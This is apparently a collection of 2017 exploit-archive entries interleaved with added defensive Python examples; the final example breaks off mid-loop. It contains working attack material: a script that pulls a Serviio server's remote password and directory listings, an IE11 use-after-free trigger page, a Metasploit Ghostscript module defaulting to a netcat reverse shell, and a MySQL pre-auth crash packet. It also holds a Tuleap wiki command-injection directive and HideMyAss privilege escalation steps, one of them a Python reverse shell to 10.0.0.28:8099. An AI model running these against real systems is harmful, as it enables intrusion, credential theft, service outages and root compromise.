
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Vendor:
# "Security:
# MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
# so that you can be sure your content is only accessed by you. Make sure you keep your password
# secure."
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an information disclosure vulnerability due to improper access control enforcement
# of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
# via a specially crafted request, to gain access to potentially sensitive information.
#
# Tested on: Restlet-Framework/2.2
#            Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#            Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#            Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5404
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#


import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen

if (len(sys.argv) <= 2):
        print '[*] Usage: serviio_id.py <ip address> <port>'
        print '[*] Example: serviio_id.py 10.211.55.3 23423'
        exit(0)

host = sys.argv[1]
port = sys.argv[2]

headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
print '\nPrinting ServiioLinks:'
print '----------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)

for URLs in roottree.iter('serviioLink'):
     print URLs.text

print

headers = {'Accept': 'application/xml'}
#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
print '\nPrinting directories:'
print '---------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)

for URLs in roottree.iter('path'):
     print URLs.text

print

headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
print '\nPrinting mediabrowser password:'
print '-------------------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)

for URLs in roottree.iter('remoteUserPassword'):
     print URLs.text

print


'''
rewt@zslab:~# python serviio_id.py 10.211.55.3 23423         

Printing ServiioLinks:
----------------------

serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource


Printing directories:
---------------------

/etc/apache2
/etc/asl
/etc/cups
/etc/defaults
/etc/emond.d
/etc/mach_init.d
/etc/mach_init_per_login_session.d
/etc/mach_init_per_user.d
/etc/manpaths.d
/etc/newsyslog.d
/etc/openldap
/etc/pam.d
/etc/paths.d
/etc/periodic
/etc/pf.anchors
/etc/postfix
/etc/ppp
/etc/racoon
/etc/security
/etc/snmp
/etc/ssh
/etc/ssl
/etc/sudoers.d


Printing mediabrowser password:
-------------------------------

s3cr3to

rewt@zslab:~#
'''
            
<!DOCTYPE html>
<html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
        background-color:black;
        font-color:red;
   };
  </style>
  
  <script type='text/javascript'></script> 
  <script type="text/javascript" language="JavaScript">
  
    /********************************
     *  Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
     *  Google Dork: n/a
     *  Date: 03.05.2017
     *  Exploit Author: Marcin Ressel 
     *  TT: @r_esselm
     *  Vendor Homepage: www.microsoft.com
     *  Software Link: n/a
     *  Version: 11.0.9600.18638
     *  Tested on: Windows 7
     *  CVE : n/a
     *  ****************************
        (151c.10a4): Access violation - code c0000005 (first chance)
        First chance exceptions are reported before any exception handling.
        This exception may be expected and handled.
        eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
        eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0         nv up ei pl nz na po nc
        cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
        MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
        706af750 ff36            push    dword ptr [esi]      ds:002b:1195cfa0=????????
        0:007> !heap -p -a @esi
               address 1195cfa0 found in
               _DPH_HEAP_ROOT @ 9f61000
               in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                        ef4230c:         1195c000             2000
        743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
        76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
        76f4a863 ntdll!RtlpFreeHeap+0x0000005d
        76ef2bd5 ntdll!RtlFreeHeap+0x00000142
        769c14ad kernel32!HeapFree+0x00000014
        707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
        6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
        7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
        702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
        702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
        700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
        700c5484 MSHTML!CFrameSite::Passivate+0x00000024
        6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
        6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
        705517cb MSHTML!CBase::JSBind_Release+0x00000050
        6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
        6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
        6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
        6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
        6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
        6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
        6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
        6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
        6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
        6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
        6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
        709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
        7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
        706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
        7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
        70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
        7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
 * 
 */ 
  
    var ref = [];
    var doc = null;
    var dom = null;
    var trg = null;
    var trg_parent = null;
    var text_r = null;
    var select_o = null;
    
    function handle() {
    
                try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
                try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
                try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
                try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
                try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
                try{text_r.select();}catch(e){}
                try{tree_r.setEnd(ref[0],0);}catch(e){}
                try{select_o.selectAllChildren(doc.body);}catch(e){}
                try{tree_r.surroundContents(ref[0]);}catch(e){}
                try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
                try{tree_r.selectNodeContents(document.body);}catch(e){}
                try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
                
    }
  
  
    function testcase() {
    
             var  e1f = document.getElementById("e1");
				     doc = document.getElementById("t1").contentWindow.document; 
				     
             e = e1f.contentWindow.document.createElement("ins"); 
				     e.cite = 'about:blank';
				     rf = doc.body.appendChild(e); 
				     ref.push(rf); 
				     e = e1f.contentWindow.document.createElement("iframe");
				     rf = doc.body.appendChild(e); 
				     ref.push(rf); 
             
				     dom = doc.getElementsByTagName("*"); 
				     trg = dom[3]; 
             trg_parent = doc.body;
             text_r = doc.body.createTextRange(); 
			       tree_r = doc.createRange(); 
		 	       tree_r.setStart(trg,0); 
				     tree_r.setEnd(trg,0);
             select_o = window.getSelection(); 
    
             var ob = new MutationObserver(handle);
                 ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true }); 
   
           	try { 
                trg.insertBefore(document.createElement("div"),ref[1]);    
            } catch(e) {}
		   
            doc.adoptNode(trg.attributes[0]);
		        trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "&Agrave;";
		        tmp = trg;
  }
  
  </script>
  <title>IE11  MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
  </head>
  <body onload='testcase();'>
   <iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
  </body>
</html>
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit

  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Ghostscript Type Confusion Arbitrary Command Execution',
      'Description'     => %q{
        This module exploits a type confusion vulnerability in Ghostscript that can
        be exploited to obtain arbitrary command execution. This vulnerability affects
        Ghostscript version 9.21 and earlier and can be exploited through libraries
        such as ImageMagick and Pillow.
      },
      'Author'          => [
        'Atlassian Security Team', # Vulnerability discovery
        'hdm'                      # Metasploit module
      ],
      'References'      => [
        %w{CVE 2017-8291},
        %w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
        %w{URL http://seclists.org/oss-sec/2017/q2/148},
        %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
        %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
      ],
      'DisclosureDate'  => 'Apr 27 2017',
      'License'         => MSF_LICENSE,
      'Platform'        => 'unix',
      'Arch'            => ARCH_CMD,
      'Privileged'      => false,
      'Payload'         => {
        'BadChars'      => "\x22\x27\x5c)(", # ", ', \, (, and )
        'Compat'        => {
          'PayloadType' => 'cmd cmd_bash',
          'RequiredCmd' => 'generic netcat bash-tcp'
        }
      },
      'Targets'         => [
        ['EPS file',  template: 'msf.eps']
      ],
      'DefaultTarget'   => 0,
      'DefaultOptions'  => {
        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
        'LHOST'                 => Rex::Socket.source_address,
        'DisablePayloadHandler' => false,
        'WfsDelay'              => 9001
      }
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.eps'])
    ])
  end

  # Example usage from the bug tracker:
  # $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps

  def exploit
    file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded))
  end

  def template
    ::File.read(File.join(
      Msf::Config.data_directory, 'exploits', 'CVE-2017-8291',
      target[:template]
    ))
  end

end
            
'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''

import socket 
import sys
from struct import pack

'''
CVE-2017-3599 Proof of Concept exploit code.

https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/

Rodrigo Marcos

'''

if len(sys.argv)<2:

	print "Usage: python " + sys.argv[0] + " host [port]"
	exit(0)

else:
	HOST = sys.argv[1]

	if len(sys.argv)>2:
		PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
	else:
		PORT = 3306

print "[+] Creating packet..."

'''
3 bytes		Packet length
1 byte		Packet number

Login request:

Packet format (when the server is 4.1 or newer):

Bytes       Content
-----       ----
4           client capabilities
4           max packet size
1           charset number
23          reserved (always 0)
n           user name, \0-terminated
n           plugin auth data (e.g. scramble), length encoded
n           database name, \0-terminated
            (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n           client auth plugin name - \0-terminated string,
            (if CLIENT_PLUGIN_AUTH is set in the capabilities)

'''

# packet_len = '\x64\x00\x00'

packet_num = '\x01'

#Login request packet
packet_cap = '\x85\xa2\xbf\x01'		# client capabilities (default)
packet_max = '\x00\x00\x00\x01'		# max packet size (default)
packet_cset = '\x21'				# charset (default)
p_reserved = '\x00' * 23 			# 23 bytes reserved with nulls (default)
packet_usr =  'test\x00' 			# username null terminated (default)

packet_auth  = '\xff'			# both \xff and \xfe crash the server

'''
Conditions to crash:

1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars

The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''

packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth 
packet_len = pack('i',len(packet))[:3]

request = packet_len + packet_num + packet

print "[+] Connecting to host..."
try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))
	print "[+] Connected."

except:
	print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."	
	s.close()
	print "[+] Exiting."
	exit(0)

print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."

print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request

s.close()
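As an added example (not part of the SECFORCE PoC above), the following Python 3 parser implements the login-request layout from the comment block together with the bounds check the crash conditions call for: a length prefix of 0xfe or 0xff must be followed by 8 bytes, and the parser rejects the packet instead of reading past its end. The capability flag values are the standard MySQL client flags; `build_login_payload` reuses the PoC's default field bytes so the check can be exercised offline.

```python
import struct

# MySQL client capability flags that decide the login-request layout.
CLIENT_CONNECT_WITH_DB = 0x00000008
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA = 0x00200000


class MalformedPacket(ValueError):
    """A field claims more bytes than the packet actually carries."""


def read_lenenc_int(buf, pos):
    """Bounds-checked MySQL length-encoded integer at buf[pos] -> (value, next_pos)."""
    if pos >= len(buf):
        raise MalformedPacket("length prefix missing")
    first = buf[pos]
    if first < 0xfb:
        return first, pos + 1
    if first == 0xfb:
        raise MalformedPacket("0xfb (NULL) is not valid in a login request")
    # 0xfc/0xfd/0xfe announce a 2/3/8-byte little-endian length. The PoC notes
    # that 0xff crashes just like 0xfe, so it is treated as the 8-byte form here
    # and then rejected by the same bounds check.
    width = {0xfc: 2, 0xfd: 3}.get(first, 8)
    avail = len(buf) - (pos + 1)
    if avail < width:
        raise MalformedPacket("prefix 0x%02x needs %d bytes, only %d available"
                              % (first, width, avail))
    value = int.from_bytes(buf[pos + 1:pos + 1 + width], "little")
    return value, pos + 1 + width


def read_cstring(buf, pos):
    """NUL-terminated string at buf[pos] -> (bytes, next_pos)."""
    end = buf.find(b"\x00", pos)
    if end < 0:
        raise MalformedPacket("unterminated string")
    return buf[pos:end], end + 1


def parse_login_request(payload):
    """Parse a 4.1+ login request payload (the bytes after the 4-byte length/number header)."""
    if len(payload) < 32:
        raise MalformedPacket("payload shorter than the 32-byte fixed part")
    caps, max_packet, charset = struct.unpack_from("<IIB", payload, 0)
    pos = 32  # 4 capabilities + 4 max packet size + 1 charset + 23 reserved
    user, pos = read_cstring(payload, pos)
    n = None
    if caps & CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA:
        n, pos = read_lenenc_int(payload, pos)      # the field the PoC truncates
    elif caps & CLIENT_SECURE_CONNECTION:
        if pos >= len(payload):
            raise MalformedPacket("auth length byte missing")
        n, pos = payload[pos], pos + 1
    if n is None:
        auth, pos = read_cstring(payload, pos)      # old clients: NUL-terminated
    else:
        if len(payload) - pos < n:
            raise MalformedPacket("auth data truncated: need %d bytes" % n)
        auth, pos = payload[pos:pos + n], pos + n
    database = plugin = None
    if caps & CLIENT_CONNECT_WITH_DB:
        database, pos = read_cstring(payload, pos)
    if caps & CLIENT_PLUGIN_AUTH:
        plugin, pos = read_cstring(payload, pos)
    return {"capabilities": caps, "max_packet": max_packet, "charset": charset,
            "user": user, "auth": auth, "database": database, "plugin": plugin}


def build_login_payload(auth_field, user=b"test"):
    """Constructed payload using the PoC's default capability/max-packet/charset bytes."""
    return (b"\x85\xa2\xbf\x01" + b"\x00\x00\x00\x01" + b"\x21" + b"\x00" * 23
            + user + b"\x00" + auth_field)


def check_login_request(payload):
    """None if the payload parses cleanly, otherwise the reason it must be dropped."""
    try:
        parse_login_request(payload)
        return None
    except MalformedPacket as exc:
        return str(exc)
```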
            
# Tuleap - Command Injection in Project Wiki

**CVE:** CVE-2017-7981

**CVSSv3:** 9.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:U/RC:C)

**Versions affected:** >= 8.3 and <= 9.6.99.86

## Introduction

Tuleap is a Libre suite to plan, track, code and collaborate on software
projects. Tuleap helps development teams to build awesome applications,
better, faster, easier.

## Background

Tuleap uses PHPWiki as a plugin to provide a wiki feature for
projects. The version of PHPWiki used is 1.3.10. This version contains a
command injection vulnerability in the SyntaxHighlighter plugin. Other
applications that use PHPWiki in the same way as Tuleap will also be affected
by this issue.

The latest version of PHPWiki is 1.5.5 and is no longer vulnerable to this issue.

## Vulnerability

Authenticated users, including unprivileged users, with access to a
project containing a wiki, can exploit this command injection
(CI) vulnerability to gain remote unauthorised access to the server
hosting the Tuleap web application.

RCE is achieved by entering a SyntaxHighlighter plugin directive in a
new wiki page on any wiki available in any project. The SyntaxHighlighter
plugin in vulnerable versions of PHPWiki passes the `syntax` argument
to the `proc_open()` PHP builtin function, which spawns a process in the
operating system running the web application.

The following is an example plugin directive which would cause the `id(1)`
command to be executed on a Linux server running an affected version
of Tuleap.

```
<?plugin SyntaxHighlighter syntax="c;id"
code to be highlighted
?>
```

The result of the command execution can be seen in the image below.

![command execution](2017.04.tuleap-auth-ci.command-exec.png)
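As an added example, not Tuleap or PHPWiki code, the following Python 3 scanner finds SyntaxHighlighter directives in wiki-page source and flags a `syntax` argument that is not a plain language identifier, which is the allowlist check a fixed plugin should make before the value can reach `proc_open()`. The directive regex, the permitted character set and the sample page are assumptions of the example.

```python
import re

# A PHPWiki plugin invocation: <?plugin Name arg="value" ... ?>. For SyntaxHighlighter
# the text after the first newline is the code to highlight (as in the advisory's
# example), so only the first line of the invocation carries arguments.
PLUGIN_RE = re.compile(r"<\?plugin\s+(?P<name>\w+)(?P<rest>.*?)\?>", re.S)
ARG_RE = re.compile(r"""(?P<key>\w+)\s*=\s*(?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)'|(?P<bare>[^\s?]+))""")
# What a highlighter language name may look like (assumed allowlist): letters,
# digits and the punctuation real names use (c++, objective-c, shell_script).
# Shell metacharacters such as ; | & $ ` ( ) or whitespace can never be a language.
SAFE_SYNTAX_RE = re.compile(r"[A-Za-z0-9_+.-]{1,32}")


def parse_args(arg_text):
    """Turn ' syntax="c;id" lines=1' into {'syntax': 'c;id', 'lines': '1'}."""
    args = {}
    for m in ARG_RE.finditer(arg_text):
        for group in ("dq", "sq", "bare"):
            if m.group(group) is not None:
                args[m.group("key")] = m.group(group)
                break
    return args


def is_safe_syntax(value):
    """True only for a value the plugin may pass on as a language name."""
    return SAFE_SYNTAX_RE.fullmatch(value or "") is not None


def scan_wiki_source(src):
    """List every SyntaxHighlighter directive in a page with its syntax value and verdict."""
    findings = []
    for m in PLUGIN_RE.finditer(src):
        if m.group("name") != "SyntaxHighlighter":
            continue
        first_line = m.group("rest").split("\n", 1)[0]
        syntax = parse_args(first_line).get("syntax", "")
        findings.append({
            "line": src.count("\n", 0, m.start()) + 1,
            "syntax": syntax,
            "safe": is_safe_syntax(syntax),
        })
    return findings


# Constructed sample page: one legitimate directive, the advisory's own injection
# directive, the same value unquoted, and an unrelated plugin that must be ignored.
SAMPLE_PAGE = """Some text.
<?plugin SyntaxHighlighter syntax="c"
int main(void) { return 0; }
?>
<?plugin SyntaxHighlighter syntax="c;id"
code to be highlighted
?>
<?plugin SyntaxHighlighter syntax=c;id
x
?>
<?plugin RecentChanges limit=10 ?>
"""

if __name__ == "__main__":
    for f in scan_wiki_source(SAMPLE_PAGE):
        print("line %(line)d: syntax=%(syntax)r safe=%(safe)s" % f)
```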

## Versions Affected

This vulnerability has existed in the version of PHPWiki used by the
Tuleap project since at least version 8.3 through to 9.6.99.86.

## References

https://github.com/xdrr/vulnerability-research/blob/master/webapp/tuleap/2017.04.tuleap-auth-ci.md

https://tuleap.net/plugins/tracker/?aid=10159

## Credit

This vulnerability was discovered by Ben N (pajexali@gmail.com) 19
April 2017.
            
Source: https://www.securify.nl/advisory/SFY20170408/local_privilege_escalation_vulnerability_in_hidemyass_pro_vpn_client_v3_x_for_macos.html

Abstract
A local privilege escalation vulnerability has been found in the helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS. The helper is installed setuid root and uses the openvpn binary to create VPN profiles and connections. The helper fails to perform signature checks on the openvpn file, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.


Tested versions:
This issue was tested on HideMyAss Pro VPN v3.3.0.3 for macOS.


Fix:
There is currently no fix available.


Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for macOS. It was discovered that version 3.x of HMA Pro VPN for macOS is affected by local privilege escalation.


Details:
The helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS is installed in PrivilegedHelperTools and run every time the user reboots. The privileged helper is responsible for opening VPN connections with correct security and connection profile settings.

The com.privax.hmaprovpn.helper is installed setuid root and fails to perform signature checks on the openvpn executable, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.

/advisory/SFY20170408/runopenvpnasroot.png
/advisory/SFY20170408/startopenvpn.png


Proof of Concept:
1) Create a Python script named openvpn and make sure it is executable (chmod u+x).

#!/usr/bin/python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.28",8099));os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

2) Replace the openvpn binary located in the path below with this Python script.

/Applications/HMA\!\ Pro\ VPN.app/Contents/XPCServices/HMA\!\ Pro\ VPN\ Engine.xpc/Contents/MacOS/

3) Wait until the victim opens a VPN connection. 
            
Source: https://www.securify.nl/advisory/SFY20170402/multiple_local_privilege_escalation_vulnerabilities_in_hidemyass_pro_vpn_client_v2_x_for_os_x.html

Abstract
Multiple local privilege escalation vulnerabilities were found in the helper binary HMAHelper that ships with HideMyAss Pro VPN for OS X. The helper is installed setuid root and responsible for loading Kernel Extensions (kext) and managing VPN firewall rules. These issues can be leveraged by a local attacker to gain elevated (root) privileges.


Tested versions:
This issue was tested on HMA Pro VPN version 2.2.7.0 for OS X.


Fix:
HMA Support has reported that this issue will not be fixed. Version 2.2.7.0 is still available for download and was earlier this year also available in the Mac App Store. It seems that this version is still available for older versions of OS X (OS X 10.7 - 10.11).

It should be noted the latest version of HMA Pro VPN for OS X (version 3.3.0.3) is vulnerable to a similar local privilege escalation issue that is also not fixed at the time of writing.


Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for OS X. It was discovered that version 2.x of HMA Pro VPN for OS X is affected by multiple local privilege escalation vulnerabilities.


Details:
The helper binary HMAHelper that ships with HMA Pro VPN for OS X is installed as setuid root. The helper has the ability to execute several commands as root, including running kernel extensions (kext) but also enabling and disabling security firewall rules.

Although disabling the firewall is dangerous enough, it was found that the helper is affected by multiple local privilege escalation vulnerabilities. Taking the FirewallDisable rule as an example, the code snippet below shows that there is no limit to which executable can be executed allowing a local user (or malware) to run any executable as root.

Privax.OSX.HMA.Helper.FirewallManager 
private static void FirewallDisableSelected(string path, string args, string processNames)
{
   using (Process process = new Process())
   {
      ProcessStartInfo startInfo = process.StartInfo;
      startInfo.FileName = "/usr/bin/sudo";
      startInfo.Arguments = string.Format("\"{0}\" \"{1}\" \"{2}\"", (object) path, (object) args, (object) processNames);
      startInfo.CreateNoWindow = true;
      startInfo.UseShellExecute = false;
      PermissionsManager.PermissionsSet(PermissionsManager.UIDRoot, PermissionsManager.GIDWheel);
      process.Start();
      process.WaitForExit();
   }
}


Proof of concept:

/Applications/HMA\!\ Pro\ VPN.app/Contents/Resources/Applications/HMAHelper.app/Contents/MacOS/HMAHelper --sib-firewall-enable 'su' ''
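Both advisories (v3 above and v2 here) come down to a setuid-root helper executing a binary it does not control: the user-owned openvpn file in v3, and any caller-supplied path in v2's FirewallDisableSelected. As an added example, not Privax or HMA code, the following Python 3 function performs the checks such a helper should make before executing anything: the path must be on a fixed allowlist, a root-owned regular file that is not group/world writable, every ancestor directory must be equally protected, and (optionally, macOS only) its code signature must verify. The allowlist paths are placeholders and the temporary file in `demo_untrusted_file` is constructed.

```python
import os
import stat
import subprocess
import tempfile

# Fixed allowlist of executables the helper may launch (placeholder paths; a real
# helper would list its bundled openvpn and the firewall tools it needs).
ALLOWED_EXECUTABLES = frozenset({
    "/Library/PrivilegedHelperTools/example-openvpn",   # placeholder
    "/sbin/pfctl",
})
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def audit_executable(path, allowed=ALLOWED_EXECUTABLES, require_signature=False):
    """Return the reasons a root helper must refuse to exec `path` (empty list == OK)."""
    problems = []
    if not os.path.isabs(path) or path not in allowed:
        problems.append("not on allowlist")
    try:
        st = os.lstat(path)
    except OSError as exc:
        problems.append("cannot stat: %s" % exc)
        return problems
    if stat.S_ISLNK(st.st_mode):
        problems.append("is a symlink")
    elif not stat.S_ISREG(st.st_mode):
        problems.append("not a regular file")
    if st.st_uid != 0:
        # The v3 case: a binary owned by the installing user can be swapped by that user.
        problems.append("file not owned by root (uid %d)" % st.st_uid)
    if st.st_mode & WRITABLE_BY_OTHERS:
        problems.append("file writable by group or others (mode %o)" % stat.S_IMODE(st.st_mode))
    # A root-owned 0755 binary is still replaceable if any parent directory is not.
    d = os.path.dirname(os.path.abspath(path))
    while True:
        dst = os.stat(d)
        if dst.st_uid != 0 or dst.st_mode & WRITABLE_BY_OTHERS:
            problems.append("directory %s is not root-owned and protected" % d)
        parent = os.path.dirname(d)
        if parent == d:
            break
        d = parent
    if require_signature:
        # macOS: codesign(1) exits non-zero when the signature is missing or invalid.
        r = subprocess.run(["codesign", "--verify", "--deep", "--strict", path],
                           capture_output=True)
        if r.returncode != 0:
            problems.append("code signature missing or invalid")
    return problems


def run_privileged(path, args, **audit_kwargs):
    """Exec an allowlisted binary with an argv list: no sudo, no shell, no string formatting."""
    problems = audit_executable(path, **audit_kwargs)
    if problems:
        raise PermissionError("refusing to run %s: %s" % (path, "; ".join(problems)))
    return subprocess.run([path] + list(args), check=False)


def demo_untrusted_file():
    """Constructed case: a world-writable file owned by the current user, like the
    user-owned openvpn binary in the v3 advisory. Returns the audit findings."""
    fd, tmp = tempfile.mkstemp(prefix="fake-openvpn-")
    os.close(fd)
    try:
        os.chmod(tmp, 0o777)
        return audit_executable(tmp, allowed=frozenset({tmp}))
    finally:
        os.unlink(tmp)


if __name__ == "__main__":
    for p in demo_untrusted_file():
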